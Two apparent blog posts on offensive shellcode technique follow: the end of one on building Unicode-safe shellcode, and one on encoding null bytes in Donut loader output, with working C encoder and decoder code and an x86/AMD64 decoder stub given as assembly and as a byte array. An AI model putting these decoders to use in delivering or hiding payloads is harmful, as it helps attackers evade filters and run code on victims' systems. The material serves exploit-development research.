"\x00\x4d\x00"         /* add   byte [rbp], cl       */

Works fine, but because 0x83 converts to a double-byte encoding, we can’t use it.

Set the Carry Flag (CF) with STC. Subtract 0 + CF from AL using SBB AL, 0, which sets AL to 0xFF. Create a variable set to 0 on the stack. Load the address of that variable into rdi. Store AL in variable four times before loading into RAX. Doesn’t work once the addition after STC is executed.

"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1c\x00"             /* sbb   al, 0               */
"\x6a\x00"             /* push  0                   */
"\x54"                 /* push  rsp                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x5f"                 /* pop   rdi                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

The next snippet simply copies the value of RCX to RAX. It’s overcomplicated and the POP QWORD instruction might be useful in some scenario. I just didn’t find it useful.

"\x6a\x00"             /* push  0              */
"\x54"                 /* push  rsp            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x58"                 /* pop   rax            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x51"                 /* push  rcx            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x8f\x00"             /* pop   qword [rax]    */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x5f"                 /* pop   rax            */

Adding registers is a problem, specifically when a carry occurs. Any operation on a 32-bit register automatically clears the upper 32-bits of a 64-bit register, so to perform addition and subtraction on addresses, ADD and SUB of 32-bit registers isn’t useful.

    push   0
    pop    rcx
    xnop
    push   rbp              ; save rbp      
    xnop
    ; 1. ====================================
    push   0                ; store 0 as X
    push   rsp              ; store &X
    xnop
    pop    rbp              ; load &X
    xnop
    ; 2. ====================================
    mov    eax, 0xFF001200  ; load 0xFF001200
    add    [rbp], ah        ; add 0x12
    adc    al, 0            ; AL = CF
    push   rbp              ; store &X
    xnop
    push   rsp              ; store &&X
    xnop
    pop    rax              ; load &&X
    xnop
    inc    dword[rax]       ; &X++
    pop    rbp
    xnop
    add    [rbp], al        ; add CF
    ; 3. ====================================

Finally, one that may or may not be useful. Imagine you have a shellcode and you want to reconstruct it in memory before executing. If the address of table 1 is in RAX, table 2 in RSI and R8 is zero, this next instruction might be useful. Every even byte of the shellcode would be stored in one table with every odd byte stored in another. Then at runtime, we combine the two. The only problem is getting R8 to zero because anything that uses it requires a REX prefix. I’m leaving here in the event R8 is already zero..

    ; read byte from table 2
    lodsb
    add [rbp], cl
    add byte[rax+r8+1], al   ; copy to table 1
    add [rbp], cl
    
    lodsb
    add [rbp], cl
    add byte[rax+r8+3], al
    add [rbp], cl
    
    lodsb
    add [rbp], cl
    add byte[rax+r8+5], al
    add [rbp], cl
    
    ; and so on..
    
    ; execute
    push rax
    ret

Using the above instruction to add 8-bits to 32-bit word.

    ; step 1
    push   rax              ; save pointer
    add    byte[rbp], cl
    add    byte[rax+r8], bl ; A[0] += B[0]
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 2
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24   
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[1] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 3
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24    
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[2] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl

    ; step 4
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24    
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[3] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 5
    rol    dword[rax], 24
    add    byte[rbp], cl

As you can see, it’s a mess to try simulate instructions instead of just writing the code to memory and executing that way…or use CF_UNICODETEXT for copying to the clipboard. 😉

em_demo

Shellcode: Encoding Null Bytes Faster With Escape Sequences

By: odzhan
26 June 2020 at 09:00

Introduction

Quick post about a common problem removing null bytes in the loader generated by Donut. Replacing opcodes that contain null bytes with equivalent snippets is enough to solve the problem for a shellcode of no more than a few hundred bytes. It’s also possible to automate using encoders found in msfvenom and pwntools. However, the problem most users experience is when the loader generated by Donut is a few hundred kilobytes or even a few megabytes! This post demonstrates how to use escape sequences to facilitate faster encoding of null bytes. Maybe “escape codes” is a better description? You can find a PoC encoder here, which can be used to add an x86/AMD64 decoder to a shellcode generated by Donut.

XOR Cipher

Readers will be aware of the eXclusive-OR (XOR) cipher and its extensive use as a component or building block in many cryptographic primitives. It’s also a popular choice for obfuscating shellcode and specifically removing null bytes. In the past, the following code in C is what I’d probably use to find a suitable key. It will work with keys of any length, but is slow as hell for anything more than 24-Bits.

int find_xor_key(
  const void *inbuf, u32 inlen, 
  void *outbuf, int outlen) 
{
    int i, j, keylen=1;
    u8  *in = (u8*)inbuf, *key=(u8*)outbuf;
    
    // initialize key
    for(i=0; i<outlen; i++) {
      key[i] = (i < keylen) ? 0 : -1;
    }
    
    // while keylen is less than max key requested
    while(keylen < outlen) {
      // xor data with current key
      for(i=0; i<inlen; i++) {
        // if the result of xor is zero. end loop
        if((in[i] ^ key[i % keylen]) == 0) break;
      }
      // if we processed all data successfully
      if(i == inlen) {
        // return current key and its length
        return keylen;
      }
      // otherwise, update the key
      for(i=0; ; i++) {
        if(++key[i]) break;
      }
      // update the key length
      if(i == keylen) keylen++;
    }
    // return nothing found
    return 0;
}

The following function can be used to test it and works relatively fast for something that’s compact, like 1KB, but sucks for anything > 3072 bytes, which I admit is unusual for shellcode.

void test_key(void) {
    int i, keylen;
    u8  key[8], data[1024];
    
    srand(time(0));
    
    // fill buffer with pseudo-random bytes
    for(i=0; i<sizeof(data); i++) {
      data[i] = rand();
    }
    // try find a suitable XOR key for the data
    keylen = find_xor_key(data, sizeof(data), key, sizeof(key));
    
    printf("Suitable key %sfound.\n\n", 
      keylen ? "" : "could not be ");
    
    if(keylen) {
      printf("Key length : %i\nKey        : ", keylen);
      while(keylen--) {
        printf("%02x ", key[keylen]);
      }
      putchar('\n');
    }
}

find_xor_key() could be re-written to use multiple threads and this would speed up the search. You might even be able to use a GPU or cluster of computers, but the overall problem isn’t finding a key. We’re not trying to crack ciphertext. All we want to do is encode and later decode null bytes, and for the Donut loader, this approach is very inefficient.

Encoding Algorithm

Escape sequences have been used in computing since the 1970s and most of you will already be familiar with them. I’m not sure if I’m using the correct terminology for what I describe next, but hopefully you’ll understand why I did. Textual encoding algorithms like Base64, Ascii85 and BasE91 were considered first of course. And Qkumba wrote a very cool base64 decoder that uses just ASCII characters that I was very tempted to use. In the end, using an escape code to indicate a null byte is simpler to implement.

  1. Read a byte from the input file or stream and assign to X.
  2. Assign X plus 1 to Y.
  3. If Y is not 0 or 1, goto step 6.
  4. Save the escape sequence 0x01 to the output file or stream.
  5. XOR X with predefined 8-Bit key K, goto step 7.
  6. Add 1 to X.
  7. Save X to the output file or stream.
  8. Repeat step 1-7 until EOF.

Although I use an XOR cipher in step 5, it could be replaced with something else.

static
void nullz_encode(FILE *in, FILE *out) {
    char c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // adding one is just an example
      t = c + 1;
      // is the result 0(avoid) or 1(escape)?
      if(t == 0 || t == 1) {
        // write escape sequence
        putc(0x01, out);
        // The XOR is an optional step.
        // Avoid using 0x00 or 0xFF with XOR!
        putc(c ^ NULLZ_KEY, out);
      } else {
        // save byte plus 1
        putc(c + 1, out);
      }
    }
}

Decoding Algorithm

  1. Read a byte from the input file or stream and assign to X.
  2. If X is not an escape sequence 0x01, goto step 5.
  3. Read a byte from the input file or stream and assign to X.
  4. XOR X with predefined 8-Bit key K used for encoding, goto step 6.
  5. Subtract 1 from X.
  6. Save X to the output file or stream.
  7. Repeat steps 1-6 until EOF.
static
void nullz_decode(FILE *in, FILE *out) {
    char c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if this is an escape sequence
      if(c == 0x01) {
        // read next byte and XOR it
        c = getc(in);
        // The XOR is an optional step.
        putc(c ^ NULLZ_KEY, out);
      } else {
        // else subtract byte
        putc(c - 1, out);
      }
    }
}

x86/AMD64 assembly

This assembly is compatible with both 32-Bit and 64-bit modes. It expects to run from RWX memory, so YMMV with this. If you want to execute from RX memory only, then this will require allocation of memory on the stack.

    bits   32
    
    %define NULLZ_KEY 0x4D
    
nullz_decode:
_nullz_decode:
    jmp    init_code
load_code:
    pop    esi
    lodsd                    ; load original length of data
    xor    eax, 0x12345678   ; change to 32-bit key    
    xchg   eax, ecx
    push   esi               ; save pointer to code on stack
    pop    edi               ; 
    push   esi
decode_main:
    lodsb                    ; read a byte
    dec    al                ; c - 1
    jnz    save_byte
    lodsb                    ; read next byte
    xor    al, NULLZ_KEY     ; c ^= NULLZ_KEY
save_byte:
    stosb                    ; save in buffer
    loop   decode_main
    ret                      ; execute shellcode
init_code:
    call   load_code
    ; XOR encoded shellcode goes here..

Building the Loader

  1. Allocate memory to hold the decoder, 32-bits for the original length of input file and file data itself.
  2. Copy the decoder to memory.
  3. Set the key in decoder that will decrypt the original length. The offset of this value is defined by NULLZ_LEN.
  4. Set the original length, encrypted with XOR, right after the decoder.
  5. Set input file data right after the original length.
  6. Save memory to file.

An option to update the XOR key is left up to you.

// compatible with x86 and x86-64
char NULLZ_DECODER[] = {
  /* 0000 */ "\xeb\x17"             /* jmp   0x19            */
  /* 0002 */ "\x5e"                 /* pop   esi             */
  /* 0003 */ "\xad"                 /* lodsd                 */
#define NULLZ_LEN 5
  /* 0004 */ "\x35\x78\x56\x34\x12" /* xor   eax, 0x12345678 */
  /* 0009 */ "\x91"                 /* xchg  eax, ecx        */
  /* 000A */ "\x56"                 /* push  esi             */
  /* 000B */ "\x5f"                 /* pop   edi             */
  /* 000C */ "\x56"                 /* push  esi             */
  /* 000D */ "\xac"                 /* lodsb                 */
  /* 000E */ "\xfe\xc8"             /* dec   al              */
  /* 0010 */ "\x75\x03"             /* jne   0x15            */
  /* 0012 */ "\xac"                 /* lodsb                 */
  /* 0013 */ "\x34\x4d"             /* xor   al, 0x4d        */
  /* 0015 */ "\xaa"                 /* stosb                 */
  /* 0016 */ "\xe2\xf5"             /* loop  0xd             */
  /* 0018 */ "\xc3"                 /* ret                   */
  /* 0019 */ "\xe8\xe4\xff\xff\xff" /* call  2               */
};

Summary

Before settling with escape sequences, I examined a number of other ways that null bytes might be encoded and decoded at runtime by a shellcode.

Initially, I thought of byte substitution, which is a non-linear operation used by legacy block ciphers. Scrapped that idea.

Experimented with match referencing, which is very common for lossless compression algorithms. Wrote a few bits of code to process files and then calculate the change in size. For every null byte found in a file, save the position and length before passing the null bytes to a function F for modification. An involution, like an XOR is fine to use as F. Then encode the offset and length using elias gamma2 codes. The change in file size was approx. 4% and I thought this might be the best way. It requires more code and is more complicated, but certainly an option.

Thought about bit tags. Essentially using 1-Bit to indicate whether a byte is encoded or not. Change in file size would be ~12% since every byte would require 1-Bit. This eventually led to escape sequences, which I think is the best approach.

❌
❌